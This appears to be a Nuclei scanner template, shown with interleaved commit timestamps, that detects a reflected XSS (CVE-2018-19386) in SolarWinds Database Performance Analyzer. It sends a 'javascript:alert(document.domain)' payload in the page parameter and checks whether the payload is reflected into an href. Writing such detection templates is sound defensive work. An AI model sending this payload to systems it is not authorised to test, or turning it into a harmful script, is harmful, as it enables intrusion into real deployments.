2021-01-02 05:00:39 +00:00
id : CVE-2018-19386
2020-09-09 01:45:42 +00:00
info :
name : SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author : pikpikcu
severity : medium
2021-03-10 14:15:41 +00:00
reference : https://www.cvedetails.com/cve/CVE-2018-19386/
2021-02-05 19:44:41 +00:00
tags : cve,cve2018,solarwinds,xss
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2018-19386
cwe-id : CWE-79
description : "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI."
2020-09-09 01:45:42 +00:00
requests :
- method : GET
path :
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2020-10-15 18:50:10 +00:00
- '<a href="javascript:alert(document.domain)//'
